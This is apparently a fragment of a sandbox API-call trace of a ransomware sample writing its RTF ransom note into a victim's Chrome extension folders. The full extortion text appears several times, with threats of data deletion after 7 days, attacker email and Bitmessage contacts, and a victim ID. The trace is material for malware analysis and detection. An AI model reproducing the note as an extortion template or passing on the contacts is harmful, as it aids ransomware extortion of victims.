R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.740] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.741] CloseHandle (hObject=0x2cc) returned 1 [0283.741] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\#readme_eman#.rtf")) returned 0xffffffff [0283.742] GetLastError () returned 0x2 [0283.742] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.743] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.743] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.743] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 